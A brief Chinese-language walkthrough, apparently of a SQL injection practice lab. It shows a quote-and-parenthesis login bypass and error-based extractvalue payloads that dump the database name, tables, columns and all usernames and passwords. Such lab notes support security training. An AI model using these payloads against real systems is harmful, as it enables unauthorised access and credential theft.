(1)检测闭合方式:在username上输入" admin" "
说明输入的username后还有双引号和括号
方法一:
(2)通过其他途径知道用户名即可。如 输入" admin")# "
方法二:
(3)构造即可闭合又可报错的语句,在username处输入
爆库payload:
admin" and extractvalue(1,concat(0x7e,(select database()))) and "
爆表名payload:
admin" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and "
爆user表的列名payload:
admin" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users‘))) and "
爆user表值payload:
admin" and extractvalue(1,concat(0x7e,(select group_concat(username,‘~‘,password) from users))) and "
其他值
原文:https://www.cnblogs.com/momoli/p/10705010.html